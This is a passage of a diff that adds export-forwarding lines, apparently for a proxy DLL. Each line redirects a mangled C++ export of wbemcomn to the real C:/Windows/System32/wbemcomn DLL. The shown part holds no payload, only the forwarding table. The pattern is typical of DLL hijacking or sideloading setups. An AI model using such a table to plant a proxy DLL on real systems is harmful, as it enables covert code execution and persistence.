+    ?QueryInterface@CUnkInternal@@UEAAJAEBU_GUID@@PEAPEAX@Z=C:/Windows/System32/wbemcomn.?QueryInterface@CUnkInternal@@UEAAJAEBU_GUID@@PEAPEAX@Z @1025
+    ?QueryInterface@CWbemCallSecurity@@UEAAJAEBU_GUID@@PEAPEAX@Z=C:/Windows/System32/wbemcomn.?QueryInterface@CWbemCallSecurity@@UEAAJAEBU_GUID@@PEAPEAX@Z @1026
+    ?QueueUnblockedWaitForSingleObject@CExecQueue@@SAKPEAXK@Z=C:/Windows/System32/wbemcomn.?QueueUnblockedWaitForSingleObject@CExecQueue@@SAKPEAXK@Z @1027
+    ?QueueWaitForSingleObject@CExecQueue@@SAKPEAXK@Z=C:/Windows/System32/wbemcomn.?QueueWaitForSingleObject@CExecQueue@@SAKPEAXK@Z @1028
+    ?Read@CBuffer@@UEAAJPEAXKPEAK@Z=C:/Windows/System32/wbemcomn.?Read@CBuffer@@UEAAJPEAXKPEAK@Z @1029
+    ?ReadFromRegistry@CWMITraceSettings@@QEAAKPEBG@Z=C:/Windows/System32/wbemcomn.?ReadFromRegistry@CWMITraceSettings@@QEAAKPEBG@Z @1030
+    ?ReadLPWSTR@CBuffer@@QEAAJAEAPEBG@Z=C:/Windows/System32/wbemcomn.?ReadLPWSTR@CBuffer@@QEAAJAEAPEBG@Z @1032
+    ?Realloc@CWin32DefaultArena@@UEAAPEAXPEAX_K@Z=C:/Windows/System32/wbemcomn.?Realloc@CWin32DefaultArena@@UEAAPEAXPEAX_K@Z @1034
+    ?ReduceSql89Joins@CWQLScanner@@AEAAHXZ=C:/Windows/System32/wbemcomn.?ReduceSql89Joins@CWQLScanner@@AEAAHXZ @1035
+    ?ReduceSql92Joins@CWQLScanner@@AEAAHXZ=C:/Windows/System32/wbemcomn.?ReduceSql92Joins@CWQLScanner@@AEAAHXZ @1036
+    ?Register@CExecQueue@@KAXPEAVCThreadRecord@1@@Z=C:/Windows/System32/wbemcomn.?Register@CExecQueue@@KAXPEAVCThreadRecord@1@@Z @1037
+    ?RegisterCMIFlushRepositoryCacheHook@CWbemInstallObject@@SAXP6AJH@Z@Z=C:/Windows/System32/wbemcomn.?RegisterCMIFlushRepositoryCacheHook@CWbemInstallObject@@SAXP6AJH@Z@Z @1038
+    ?Release@CBasicUnloadInstruction@@UEAAXXZ=C:/Windows/System32/wbemcomn.?Release@CBasicUnloadInstruction@@UEAAXXZ @1041
+    ?Release@CBuffer@@UEAAKXZ=C:/Windows/System32/wbemcomn.?Release@CBuffer@@UEAAKXZ @1042
+    ?Release@CContainerControl@@UEAAXPEAUIUnknown@@@Z=C:/Windows/System32/wbemcomn.?Release@CContainerControl@@UEAAXPEAUIUnknown@@@Z @1043
+    ?Release@CExecQueue@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Release@CExecQueue@@QEAAXXZ @1044
+    ?Release@CUnk@@UEAAKXZ=C:/Windows/System32/wbemcomn.?Release@CUnk@@UEAAKXZ @1045
+    ?Release@CUnkInternal@@UEAAKXZ=C:/Windows/System32/wbemcomn.?Release@CUnkInternal@@UEAAKXZ @1046
+    ?Release@CWbemCallSecurity@@UEAAKXZ=C:/Windows/System32/wbemcomn.?Release@CWbemCallSecurity@@UEAAKXZ @1047
+    ?Release@QL_LEVEL_1_RPN_EXPRESSION@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Release@QL_LEVEL_1_RPN_EXPRESSION@@QEAAXXZ @1048
+    ?RemainsUntil@CWbemTime@@QEBA?AVCWbemInterval@@AEBV1@@Z=C:/Windows/System32/wbemcomn.?RemainsUntil@CWbemTime@@QEBA?AVCWbemInterval@@AEBV1@@Z @1049
+    ?Remove@CInstructionQueue@@QEAAJPEAVCInstructionTest@@PEAPEAVCTimerInstruction@@@Z=C:/Windows/System32/wbemcomn.?Remove@CInstructionQueue@@QEAAJPEAVCInstructionTest@@PEAPEAVCTimerInstruction@@@Z @1050
+    ?Remove@CMinMaxLimitControl@@UEAAJK@Z=C:/Windows/System32/wbemcomn.?Remove@CMinMaxLimitControl@@UEAAJK@Z @1051
+    ?Remove@CTimerGenerator@@QEAAJPEAVCInstructionTest@@@Z=C:/Windows/System32/wbemcomn.?Remove@CTimerGenerator@@QEAAJPEAVCInstructionTest@@@Z @1052
+    ?RemoveAt@CFlexArray@@QEAAHH@Z=C:/Windows/System32/wbemcomn.?RemoveAt@CFlexArray@@QEAAHH@Z @1053
+    ?RemoveAt@CSafeArray@@QEAAHH@Z=C:/Windows/System32/wbemcomn.?RemoveAt@CSafeArray@@QEAAHH@Z @1054
+    ?RemoveAt@CSmallArrayBlob@@QEAAPEAV1@HPEAPEAX@Z=C:/Windows/System32/wbemcomn.?RemoveAt@CSmallArrayBlob@@QEAAPEAV1@HPEAPEAX@Z @1055
+    ?RemoveAt@CVarVector@@QEAAHH@Z=C:/Windows/System32/wbemcomn.?RemoveAt@CVarVector@@QEAAHH@Z @1056
+    ?RemoveAt@CWStringArray@@QEAAHH@Z=C:/Windows/System32/wbemcomn.?RemoveAt@CWStringArray@@QEAAHH@Z @1057
+    ?RemoveMember@CLimitControl@@UEAAJXZ=C:/Windows/System32/wbemcomn.?RemoveMember@CLimitControl@@UEAAJXZ @1059
+    ?RemoveSelf@CClientOpsNode@@QEAAXXZ=C:/Windows/System32/wbemcomn.?RemoveSelf@CClientOpsNode@@QEAAXXZ @1060
+    ?ReplaceAt@CWStringArray@@QEAAHHPEAG@Z=C:/Windows/System32/wbemcomn.?ReplaceAt@CWStringArray@@QEAAHHPEAG@Z @1061
+    ?ReplaceClassName@QL1_Parser@@SAPEAGPEAUQL_LEVEL_1_RPN_EXPRESSION@@PEBG@Z=C:/Windows/System32/wbemcomn.?ReplaceClassName@QL1_Parser@@SAPEAGPEAUQL_LEVEL_1_RPN_EXPRESSION@@PEBG@Z @1062
+    ?Report@CEventLog@@QEAAHGAEBU_EVENT_DESCRIPTOR@@VCInsertionString@@111111111@Z=C:/Windows/System32/wbemcomn.?Report@CEventLog@@QEAAHGAEBU_EVENT_DESCRIPTOR@@VCInsertionString@@111111111@Z @1063
+    ?Requeue@CFlexQueue@@QEAA_NPEAX@Z=C:/Windows/System32/wbemcomn.?Requeue@CFlexQueue@@QEAA_NPEAX@Z @1064
+    ?Reread@CRegistryMinMaxLimitControl@@QEAAJXZ=C:/Windows/System32/wbemcomn.?Reread@CRegistryMinMaxLimitControl@@QEAAJXZ @1065
+    ?Reset@CBuffer@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Reset@CBuffer@@QEAAXXZ @1066
+    ?Reset@CMRCIControl@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Reset@CMRCIControl@@QEAAXXZ @1067
+    ?ResetDate@CDateTimeParser@@IEAAXH@Z=C:/Windows/System32/wbemcomn.?ResetDate@CDateTimeParser@@IEAAXH@Z @1068
+    ?ResetDateTime@CDateTimeParser@@IEAAXH@Z=C:/Windows/System32/wbemcomn.?ResetDateTime@CDateTimeParser@@IEAAXH@Z @1069
+    ?ResetQueue@CFlexQueue@@QEAAXXZ=C:/Windows/System32/wbemcomn.?ResetQueue@CFlexQueue@@QEAAXXZ @1070
+    ?ResetTime@CDateTimeParser@@IEAAXH@Z=C:/Windows/System32/wbemcomn.?ResetTime@CDateTimeParser@@IEAAXH@Z @1071
+    ?Resize@CNtAcl@@QEAAHK@Z=C:/Windows/System32/wbemcomn.?Resize@CNtAcl@@QEAAHK@Z @1072
+    ?Resume@CHaltable@@QEAAJXZ=C:/Windows/System32/wbemcomn.?Resume@CHaltable@@QEAAJXZ @1073
+    ?ResumeAll@CHaltable@@QEAAJXZ=C:/Windows/System32/wbemcomn.?ResumeAll@CHaltable@@QEAAJXZ @1074
+    ?ReturnEscapedReturns@CTextTemplate@@AEAAPEAGPEAG@Z=C:/Windows/System32/wbemcomn.?ReturnEscapedReturns@CTextTemplate@@AEAAPEAGPEAG@Z @1077
+    ?Revert@CBuffer@@UEAAJXZ=C:/Windows/System32/wbemcomn.?Revert@CBuffer@@UEAAJXZ @1078
+    ?RevertToSelf@CWbemCallSecurity@@UEAAJXZ=C:/Windows/System32/wbemcomn.?RevertToSelf@CWbemCallSecurity@@UEAAJXZ @1079
+    ?ScheduleFreeUnusedLibraries@CTimerGenerator@@QEAAXXZ=C:/Windows/System32/wbemcomn.?ScheduleFreeUnusedLibraries@CTimerGenerator@@QEAAXXZ @1080
+    ?SchedulerThread@CTimerGenerator@@CAKPEAX@Z=C:/Windows/System32/wbemcomn.?SchedulerThread@CTimerGenerator@@CAKPEAX@Z @1081
+    ?SearchForRecord@CEventLog@@IEAAHPEAVCEventLogRecord@@@Z=C:/Windows/System32/wbemcomn.?SearchForRecord@CEventLog@@IEAAHPEAVCEventLogRecord@@@Z @1082
+    ?SearchForSuitableRequest@CExecQueue@@MEAAPEAVCExecRequest@@PEAVCThreadRecord@1@@Z=C:/Windows/System32/wbemcomn.?SearchForSuitableRequest@CExecQueue@@MEAAPEAVCExecRequest@@PEAVCThreadRecord@1@@Z @1083
+    ?Seek@CBuffer@@UEAAJT_LARGE_INTEGER@@KPEAT_ULARGE_INTEGER@@@Z=C:/Windows/System32/wbemcomn.?Seek@CBuffer@@UEAAJT_LARGE_INTEGER@@KPEAT_ULARGE_INTEGER@@@Z @1084
+    ?SelectList@CWQLScanner@@AEAAHXZ=C:/Windows/System32/wbemcomn.?SelectList@CWQLScanner@@AEAAHXZ @1085
+    ?Serialize@C9XAce@@UEAA_NPEAE_K@Z=C:/Windows/System32/wbemcomn.?Serialize@C9XAce@@UEAA_NPEAE_K@Z @1086
+    ?Serialize@CNtAce@@UEAA_NPEAE_K@Z=C:/Windows/System32/wbemcomn.?Serialize@CNtAce@@UEAA_NPEAE_K@Z @1087
+    ?Set100nss@CWbemTime@@QEAAX_J@Z=C:/Windows/System32/wbemcomn.?Set100nss@CWbemTime@@QEAAX_J@Z @1088
+    ?Set@CTimerGenerator@@QEAAJPEAVCTimerInstruction@@VCWbemTime@@@Z=C:/Windows/System32/wbemcomn.?Set@CTimerGenerator@@QEAAJPEAVCTimerInstruction@@VCWbemTime@@@Z @1089
+    ?SetAggregated@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXXZ=C:/Windows/System32/wbemcomn.?SetAggregated@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXXZ @1090
+    ?SetAggregationTolerance@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXAEBU_tag_WbemQl1Tolerance@@@Z=C:/Windows/System32/wbemcomn.?SetAggregationTolerance@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXAEBU_tag_WbemQl1Tolerance@@@Z @1091
+    ?SetAreaFlags@CWMITraceSettings@@QEAAXK@Z=C:/Windows/System32/wbemcomn.?SetAreaFlags@CWMITraceSettings@@QEAAXK@Z @1092
+    ?SetAsNull@CVar@@QEAAXXZ=C:/Windows/System32/wbemcomn.?SetAsNull@CVar@@QEAAXXZ @1093
+    ?SetAt@CFlexArray@@QEAAXHPEAX@Z=C:/Windows/System32/wbemcomn.?SetAt@CFlexArray@@QEAAXHPEAX@Z @1094
+    ?SetAt@CSmallArrayBlob@@QEAAPEAV1@HPEAXPEAPEAX@Z=C:/Windows/System32/wbemcomn.?SetAt@CSmallArrayBlob@@QEAAPEAV1@HPEAXPEAPEAX@Z @1095
+    ?SetAt@CWStringArray@@QEAAHHPEBG@Z=C:/Windows/System32/wbemcomn.?SetAt@CWStringArray@@QEAAHHPEBG@Z @1096
+    ?SetAutoRecoverFolder@CWbemInstallObject@@SAXPEBG@Z=C:/Windows/System32/wbemcomn.?SetAutoRecoverFolder@CWbemInstallObject@@SAXPEBG@Z @1097
+    ?SetBSTR@CVar@@QEAAHPEAG@Z=C:/Windows/System32/wbemcomn.?SetBSTR@CVar@@QEAAHPEAG@Z @1098
+    ?SetBSTR@CVar@@QEAAHVauto_bstr@@@Z=C:/Windows/System32/wbemcomn.?SetBSTR@CVar@@QEAAHVauto_bstr@@@Z @1099
+    ?SetBSTRAt@CSafeArray@@QEAAHHPEAG@Z=C:/Windows/System32/wbemcomn.?SetBSTRAt@CSafeArray@@QEAAHHPEAG@Z @1100
+    ?SetBinary@Registry@@QEAAHPEBGPEAEK@Z=C:/Windows/System32/wbemcomn.?SetBinary@Registry@@QEAAHPEBGPEAEK@Z @1101
+    ?SetBinaryPath@CWbemInstallObject@@SAXPEBG@Z=C:/Windows/System32/wbemcomn.?SetBinaryPath@CWbemInstallObject@@SAXPEBG@Z @1102
+    ?SetBlob@CVar@@QEAAXPEAUtagBLOB@@H@Z=C:/Windows/System32/wbemcomn.?SetBlob@CVar@@QEAAXPEAUtagBLOB@@H@Z @1103
+    ?SetBool@CVar@@QEAAXF@Z=C:/Windows/System32/wbemcomn.?SetBool@CVar@@QEAAXF@Z @1104
+    ?SetBoolAt@CSafeArray@@QEAAHHF@Z=C:/Windows/System32/wbemcomn.?SetBoolAt@CSafeArray@@QEAAHHF@Z @1105
+    ?SetByte@CVar@@QEAAXE@Z=C:/Windows/System32/wbemcomn.?SetByte@CVar@@QEAAXE@Z @1106
+    ?SetByteAt@CSafeArray@@QEAAHHE@Z=C:/Windows/System32/wbemcomn.?SetByteAt@CSafeArray@@QEAAHHE@Z @1107
+    ?SetCanDelete@CVar@@QEAAXH@Z=C:/Windows/System32/wbemcomn.?SetCanDelete@CVar@@QEAAXH@Z @1108
+    ?SetChar@CVar@@QEAAXD@Z=C:/Windows/System32/wbemcomn.?SetChar@CVar@@QEAAXD@Z @1109
+    ?SetClassName@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXPEBG@Z=C:/Windows/System32/wbemcomn.?SetClassName@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXPEBG@Z @1110
+    ?SetClsId@CVar@@QEAAXPEAU_GUID@@H@Z=C:/Windows/System32/wbemcomn.?SetClsId@CVar@@QEAAXPEAU_GUID@@H@Z @1111
+    ?SetCountQuery@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXXZ=C:/Windows/System32/wbemcomn.?SetCountQuery@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXXZ @1112
+    ?SetDMTF@CWbemTime@@QEAAHPEBG@Z=C:/Windows/System32/wbemcomn.?SetDMTF@CWbemTime@@QEAAHPEBG@Z @1113
+    ?SetDWORD@CVar@@QEAAXK@Z=C:/Windows/System32/wbemcomn.?SetDWORD@CVar@@QEAAXK@Z @1114
+    ?SetDWORD@Registry@@QEAAHPEBGK@Z=C:/Windows/System32/wbemcomn.?SetDWORD@Registry@@QEAAHPEBGK@Z @1115
+    ?SetDWORDStr@Registry@@QEAAHPEBGK@Z=C:/Windows/System32/wbemcomn.?SetDWORDStr@Registry@@QEAAHPEBGK@Z @1116
+    ?SetDacl@CNtSecurityDescriptor@@QEAAHPEAVCNtAcl@@@Z=C:/Windows/System32/wbemcomn.?SetDacl@CNtSecurityDescriptor@@QEAAHPEAVCNtAcl@@@Z @1117
+    ?SetDate@CDatePart@@QEAAJPEBD@Z=C:/Windows/System32/wbemcomn.?SetDate@CDatePart@@QEAAJPEBD@Z @1118
+    ?SetDate@CDatePart@@QEAAJPEBG@Z=C:/Windows/System32/wbemcomn.?SetDate@CDatePart@@QEAAJPEBG@Z @1119
+    ?SetDateTime@CDateTimeParser@@QEAAHPEBG@Z=C:/Windows/System32/wbemcomn.?SetDateTime@CDateTimeParser@@QEAAHPEBG@Z @1120
+    ?SetDefaultValues@CWMITraceSettings@@QEAAKXZ=C:/Windows/System32/wbemcomn.?SetDefaultValues@CWMITraceSettings@@QEAAKXZ @1121
+    ?SetDestructorPolicy@CSafeArray@@QEAAXH@Z=C:/Windows/System32/wbemcomn.?SetDestructorPolicy@CSafeArray@@QEAAXH@Z @1122
+    ?SetDispatch@CVar@@QEAAXPEAUIDispatch@@@Z=C:/Windows/System32/wbemcomn.?SetDispatch@CVar@@QEAAXPEAUIDispatch@@@Z @1123
+    ?SetDispatchAt@CSafeArray@@QEAAHHPEAUIDispatch@@@Z=C:/Windows/System32/wbemcomn.?SetDispatchAt@CSafeArray@@QEAAHHPEAUIDispatch@@@Z @1124
+    ?SetDouble@CVar@@QEAAXN@Z=C:/Windows/System32/wbemcomn.?SetDouble@CVar@@QEAAXN@Z @1125
+    ?SetDoubleAt@CSafeArray@@QEAAHHN@Z=C:/Windows/System32/wbemcomn.?SetDoubleAt@CSafeArray@@QEAAHHN@Z @1126
+    ?SetEmbeddedObject@CVar@@QEAAXPEAUIUnknown@@@Z=C:/Windows/System32/wbemcomn.?SetEmbeddedObject@CVar@@QEAAXPEAUIUnknown@@@Z @1127
+    ?SetExpandStr@Registry@@QEAAHPEBG0@Z=C:/Windows/System32/wbemcomn.?SetExpandStr@Registry@@QEAAHPEBG0@Z @1128
+    ?SetExpression@CLike@@QEAAXPEBGG@Z=C:/Windows/System32/wbemcomn.?SetExpression@CLike@@QEAAXPEBGG@Z @1129
+    ?SetFailure@CStaticCritSec@@SAXXZ=C:/Windows/System32/wbemcomn.?SetFailure@CStaticCritSec@@SAXXZ @1130
+    ?SetFileTime@CVar@@QEAAXPEAU_FILETIME@@@Z=C:/Windows/System32/wbemcomn.?SetFileTime@CVar@@QEAAXPEAU_FILETIME@@@Z @1131
+    ?SetFileTime@CWbemTime@@QEAAHAEBU_FILETIME@@@Z=C:/Windows/System32/wbemcomn.?SetFileTime@CWbemTime@@QEAAHAEBU_FILETIME@@@Z @1132
+    ?SetFlags@C9XAce@@UEAAXJ@Z=C:/Windows/System32/wbemcomn.?SetFlags@C9XAce@@UEAAXJ@Z @1133
+    ?SetFlags@CNtAce@@UEAAXJ@Z=C:/Windows/System32/wbemcomn.?SetFlags@CNtAce@@UEAAXJ@Z @1134
+    ?SetFloat@CVar@@QEAAXM@Z=C:/Windows/System32/wbemcomn.?SetFloat@CVar@@QEAAXM@Z @1135
+    ?SetFloatAt@CSafeArray@@QEAAHHM@Z=C:/Windows/System32/wbemcomn.?SetFloatAt@CSafeArray@@QEAAHHM@Z @1136
+    ?SetFromAbsoluteCopy@CNtSecurityDescriptor@@QEAAHPEAUSNtAbsoluteSD@@@Z=C:/Windows/System32/wbemcomn.?SetFromAbsoluteCopy@CNtSecurityDescriptor@@QEAAHPEAUSNtAbsoluteSD@@@Z @1137
+    ?SetGroup@CNtSecurityDescriptor@@QEAAHPEAVCNtSid@@@Z=C:/Windows/System32/wbemcomn.?SetGroup@CNtSecurityDescriptor@@QEAAHPEAVCNtSid@@@Z @1138
+    ?SetGrowGranularity@CSafeArray@@QEAAXH@Z=C:/Windows/System32/wbemcomn.?SetGrowGranularity@CSafeArray@@QEAAXH@Z @1139
+    ?SetHandle@CPropertyName@@QEAAXPEAX@Z=C:/Windows/System32/wbemcomn.?SetHandle@CPropertyName@@QEAAXPEAX@Z @1140
+    ?SetIdleTimeout@CExecQueue@@QEAAXK@Z=C:/Windows/System32/wbemcomn.?SetIdleTimeout@CExecQueue@@QEAAXK@Z @1141
+    ?SetInfo@CClientOpsNode@@QEAAXPEAX@Z=C:/Windows/System32/wbemcomn.?SetInfo@CClientOpsNode@@QEAAXPEAX@Z @1142
+    ?SetInterval@CBasicUnloadInstruction@@QEAAXAEAVCWbemInterval@@@Z=C:/Windows/System32/wbemcomn.?SetInterval@CBasicUnloadInstruction@@QEAAXAEAVCWbemInterval@@@Z @1143
+    ?SetLPSTR@CVar@@QEAAHPEADH@Z=C:/Windows/System32/wbemcomn.?SetLPSTR@CVar@@QEAAHPEADH@Z @1144
+    ?SetLPWSTR@CVar@@QEAAHPEAGH@Z=C:/Windows/System32/wbemcomn.?SetLPWSTR@CVar@@QEAAHPEAGH@Z @1145
+    ?SetLogingEnabled@CMemoryLog@@QEAAX_N@Z=C:/Windows/System32/wbemcomn.?SetLogingEnabled@CMemoryLog@@QEAAX_N@Z @1146
+    ?SetLong@CVar@@QEAAXJ@Z=C:/Windows/System32/wbemcomn.?SetLong@CVar@@QEAAXJ@Z @1147
+    ?SetLongAt@CSafeArray@@QEAAHHJ@Z=C:/Windows/System32/wbemcomn.?SetLongAt@CSafeArray@@QEAAHHJ@Z @1148
+    ?SetMax@CMinMaxLimitControl@@QEAAXK@Z=C:/Windows/System32/wbemcomn.?SetMax@CMinMaxLimitControl@@QEAAXK@Z @1149
+    ?SetMilliseconds@CWbemInterval@@QEAAXK@Z=C:/Windows/System32/wbemcomn.?SetMilliseconds@CWbemInterval@@QEAAXK@Z @1150
+    ?SetMin@CMinMaxLimitControl@@QEAAXK@Z=C:/Windows/System32/wbemcomn.?SetMin@CMinMaxLimitControl@@QEAAXK@Z @1151
+    ?SetMultiStr@Registry@@QEAAHPEBGPEAGK@Z=C:/Windows/System32/wbemcomn.?SetMultiStr@Registry@@QEAAHPEBGPEAGK@Z @1152
+    ?SetNext@CExecRequest@@QEAAXPEAV1@@Z=C:/Windows/System32/wbemcomn.?SetNext@CExecRequest@@QEAAXPEAV1@@Z @1153
+    ?SetOffline@CWbemInstallObject@@SAX_N@Z=C:/Windows/System32/wbemcomn.?SetOffline@CWbemInstallObject@@SAX_N@Z @1155
+    ?SetOverflowIdleTimeout@CExecQueue@@QEAAXK@Z=C:/Windows/System32/wbemcomn.?SetOverflowIdleTimeout@CExecQueue@@QEAAXK@Z @1156
+    ?SetOwner@CNtSecurityDescriptor@@QEAAHPEAVCNtSid@@@Z=C:/Windows/System32/wbemcomn.?SetOwner@CNtSecurityDescriptor@@QEAAHPEAVCNtSid@@@Z @1157
+    ?SetPersistentCfgValue@CPersistentConfig@@QEAAHKK@Z=C:/Windows/System32/wbemcomn.?SetPersistentCfgValue@CPersistentConfig@@QEAAHKK@Z @1158
+    ?SetPreferredLanguages@CMUILocale@@SAJKPEBGPEAK@Z=C:/Windows/System32/wbemcomn.?SetPreferredLanguages@CMUILocale@@SAJKPEBGPEAK@Z @1159
+    ?SetPriority@CExecRequest@@QEAAXJ@Z=C:/Windows/System32/wbemcomn.?SetPriority@CExecRequest@@QEAAXJ@Z @1160
+    ?SetQWORD@Registry@@QEAAHPEBG_K@Z=C:/Windows/System32/wbemcomn.?SetQWORD@Registry@@QEAAHPEBG_K@Z @1161
+    ?SetRaw@CVar@@QEAAXHPEAXH@Z=C:/Windows/System32/wbemcomn.?SetRaw@CVar@@QEAAXHPEAXH@Z @1162
+    ?SetRawArrayBinding@CVarVector@@QEAAXH@Z=C:/Windows/System32/wbemcomn.?SetRawArrayBinding@CVarVector@@QEAAXH@Z @1163
+    ?SetRawArrayData@CVarVector@@QEAAJPEAXHH@Z=C:/Windows/System32/wbemcomn.?SetRawArrayData@CVarVector@@QEAAJPEAXHH@Z @1164
+    ?SetRawArrayMaxElement@CSafeArray@@QEAAXH@Z=C:/Windows/System32/wbemcomn.?SetRawArrayMaxElement@CSafeArray@@QEAAXH@Z @1165
+    ?SetRawArraySize@CVarVector@@QEAAHH@Z=C:/Windows/System32/wbemcomn.?SetRawArraySize@CVarVector@@QEAAHH@Z @1166
+    ?SetRawData@CSafeArray@@QEAAHPEAXHH@Z=C:/Windows/System32/wbemcomn.?SetRawData@CSafeArray@@QEAAHPEAXHH@Z @1167
+    ?SetRegistryPathCIMOM@CWbemInstallObject@@SAXPEBG@Z=C:/Windows/System32/wbemcomn.?SetRegistryPathCIMOM@CWbemInstallObject@@SAXPEBG@Z @1168
+    ?SetRegistryPathWbem@CWbemInstallObject@@SAXPEBG@Z=C:/Windows/System32/wbemcomn.?SetRegistryPathWbem@CWbemInstallObject@@SAXPEBG@Z @1169
+    ?SetRepositoryFolder@CWbemInstallObject@@SAXPEBG@Z=C:/Windows/System32/wbemcomn.?SetRepositoryFolder@CWbemInstallObject@@SAXPEBG@Z @1170
+    ?SetRequestLimits@CExecQueue@@QEAAXJJJ@Z=C:/Windows/System32/wbemcomn.?SetRequestLimits@CExecQueue@@QEAAXJJJ@Z @1171
+    ?SetSacl@CNtSecurityDescriptor@@QEAAHPEAVCNtAcl@@@Z=C:/Windows/System32/wbemcomn.?SetSacl@CNtSecurityDescriptor@@QEAAHPEAVCNtAcl@@@Z @1172
+    ?SetSafeArray@CVar@@QEAAXHPEAUtagSAFEARRAY@@@Z=C:/Windows/System32/wbemcomn.?SetSafeArray@CVar@@QEAAXHPEAUtagSAFEARRAY@@@Z @1173
+    ?SetScalarAt@CSafeArray@@AEAAHHTSA_ArrayScalar@@@Z=C:/Windows/System32/wbemcomn.?SetScalarAt@CSafeArray@@AEAAHHTSA_ArrayScalar@@@Z @1174
+    ?SetShort@CVar@@QEAAXF@Z=C:/Windows/System32/wbemcomn.?SetShort@CVar@@QEAAXF@Z @1175
+    ?SetShortAt@CSafeArray@@QEAAHHF@Z=C:/Windows/System32/wbemcomn.?SetShortAt@CSafeArray@@QEAAHHF@Z @1176
+    ?SetSize@CBuffer@@QEAAJK@Z=C:/Windows/System32/wbemcomn.?SetSize@CBuffer@@QEAAJK@Z @1177
+    ?SetSize@CBuffer@@UEAAJT_ULARGE_INTEGER@@@Z=C:/Windows/System32/wbemcomn.?SetSize@CBuffer@@UEAAJT_ULARGE_INTEGER@@@Z @1178
+    ?SetSize@CFlexArray@@QEAAXH@Z=C:/Windows/System32/wbemcomn.?SetSize@CFlexArray@@QEAAXH@Z @1179
+    ?SetSleepAtMax@CMinMaxLimitControl@@QEAAXK@Z=C:/Windows/System32/wbemcomn.?SetSleepAtMax@CMinMaxLimitControl@@QEAAXK@Z @1180
+    ?SetStr@Registry@@QEAAHPEBG0@Z=C:/Windows/System32/wbemcomn.?SetStr@Registry@@QEAAHPEBG0@Z @1181
+    ?SetSystemTime@CWbemTime@@QEAAHAEBU_SYSTEMTIME@@@Z=C:/Windows/System32/wbemcomn.?SetSystemTime@CWbemTime@@QEAAHAEBU_SYSTEMTIME@@@Z @1182
+    ?SetTemplate@CTextTemplate@@QEAAXPEBG@Z=C:/Windows/System32/wbemcomn.?SetTemplate@CTextTemplate@@QEAAXPEBG@Z @1183
+    ?SetThreadLimits@CExecQueue@@QEAAXJJJ@Z=C:/Windows/System32/wbemcomn.?SetThreadLimits@CExecQueue@@QEAAXJJJ@Z @1184
+    ?SetTolerance@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXAEBU_tag_WbemQl1Tolerance@@@Z=C:/Windows/System32/wbemcomn.?SetTolerance@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXAEBU_tag_WbemQl1Tolerance@@@Z @1185
+    ?SetTraceLevel@CWMITraceSettings@@QEAAXE@Z=C:/Windows/System32/wbemcomn.?SetTraceLevel@CWMITraceSettings@@QEAAXE@Z @1186
+    ?SetUnknown@CVar@@QEAAXPEAUIUnknown@@@Z=C:/Windows/System32/wbemcomn.?SetUnknown@CVar@@QEAAXPEAUIUnknown@@@Z @1187
+    ?SetUnknownAt@CSafeArray@@QEAAHHPEAUIUnknown@@@Z=C:/Windows/System32/wbemcomn.?SetUnknownAt@CSafeArray@@QEAAHHPEAUIUnknown@@@Z @1188
+    ?SetVarVector@CVar@@QEAAXPEAVCVarVector@@H@Z=C:/Windows/System32/wbemcomn.?SetVarVector@CVar@@QEAAXPEAVCVarVector@@H@Z @1189
+    ?SetVariant@CVar@@QEAAHPEAUtagVARIANT@@H@Z=C:/Windows/System32/wbemcomn.?SetVariant@CVar@@QEAAHPEAUtagVARIANT@@H@Z @1190
+    ?SetVariantAt@CSafeArray@@QEAAHHPEAUtagVARIANT@@@Z=C:/Windows/System32/wbemcomn.?SetVariantAt@CSafeArray@@QEAAHHPEAUtagVARIANT@@@Z @1191
+    ?SetWhenDoneHandle@CExecRequest@@QEAAXPEAX@Z=C:/Windows/System32/wbemcomn.?SetWhenDoneHandle@CExecRequest@@QEAAXPEAX@Z @1193
+    ?SetWord@CVar@@QEAAXG@Z=C:/Windows/System32/wbemcomn.?SetWord@CVar@@QEAAXG@Z @1194
+    ?Shrink@CSmallArrayBlob@@IEAAPEAV1@XZ=C:/Windows/System32/wbemcomn.?Shrink@CSmallArrayBlob@@IEAAPEAV1@XZ @1196
+    ?ShrinkIfNeeded@CSmallArrayBlob@@IEAAPEAV1@XZ=C:/Windows/System32/wbemcomn.?ShrinkIfNeeded@CSmallArrayBlob@@IEAAPEAV1@XZ @1197
+    ?Shutdown@CExecQueue@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Shutdown@CExecQueue@@QEAAXXZ @1198
+    ?Shutdown@CTimerGenerator@@UEAAJXZ=C:/Windows/System32/wbemcomn.?Shutdown@CTimerGenerator@@UEAAJXZ @1199
+    ?Shutdown@CWbemInstallObject@@SAXXZ=C:/Windows/System32/wbemcomn.?Shutdown@CWbemInstallObject@@SAXXZ @1200
+    ?ShutdownThread@CExecQueue@@MEAAXPEAVCThreadRecord@1@@Z=C:/Windows/System32/wbemcomn.?ShutdownThread@CExecQueue@@MEAAXPEAVCThreadRecord@1@@Z @1201
+    ?SitOutPenalty@CExecQueue@@MEAAXJ@Z=C:/Windows/System32/wbemcomn.?SitOutPenalty@CExecQueue@@MEAAXJ@Z @1202
+    ?Size@CFlexArray@@QEBAHXZ=C:/Windows/System32/wbemcomn.?Size@CFlexArray@@QEBAHXZ @1203
+    ?Size@CSafeArray@@QEAAHXZ=C:/Windows/System32/wbemcomn.?Size@CSafeArray@@QEAAHXZ @1204
+    ?Size@CSmallArrayBlob@@QEBAHXZ=C:/Windows/System32/wbemcomn.?Size@CSmallArrayBlob@@QEBAHXZ @1205
+    ?Size@CVarVector@@QEAAHXZ=C:/Windows/System32/wbemcomn.?Size@CVarVector@@QEAAHXZ @1206
+    ?Size@CWStringArray@@QEBAHXZ=C:/Windows/System32/wbemcomn.?Size@CWStringArray@@QEBAHXZ @1207
+    ?Sort@CFlexArray@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Sort@CFlexArray@@QEAAXXZ @1208
